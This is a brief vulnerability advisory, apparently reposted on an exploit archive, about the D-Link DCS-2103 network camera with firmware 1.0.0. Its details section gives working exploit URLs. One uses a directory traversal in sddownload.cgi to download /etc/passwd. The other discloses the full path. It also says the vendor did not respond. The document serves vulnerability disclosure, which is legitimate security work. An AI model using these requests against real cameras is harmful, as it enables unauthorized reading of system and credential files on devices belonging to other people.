id: 22896
date: 11/18/2014
title: D-Link DCS-2103 Directory Traversal Vulnerability
author: MustLive
cves: 

Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.

I found these vulnerabilities at 11.07.2014 and later informed D-Link. But
they haven't answered. It looks like they are busy with fixing
vulnerabilities in DAP-1360, which I wrote about earlier.

----------
Details:
----------

Directory Traversal (Arbitrary File Download) (WASC-33):

http://site/cgi-bin/sddownload.cgi?file=/../../etc/passwd

Full path disclosure (WASC-13):

http://site/cgi-bin/sddownload.cgi?file=/

----------------
Disclosure:
----------------

I disclosed these vulnerabilities at my site
(http://websecurity.com.ua/7250/).

#  0day.today [2023-03-23]  #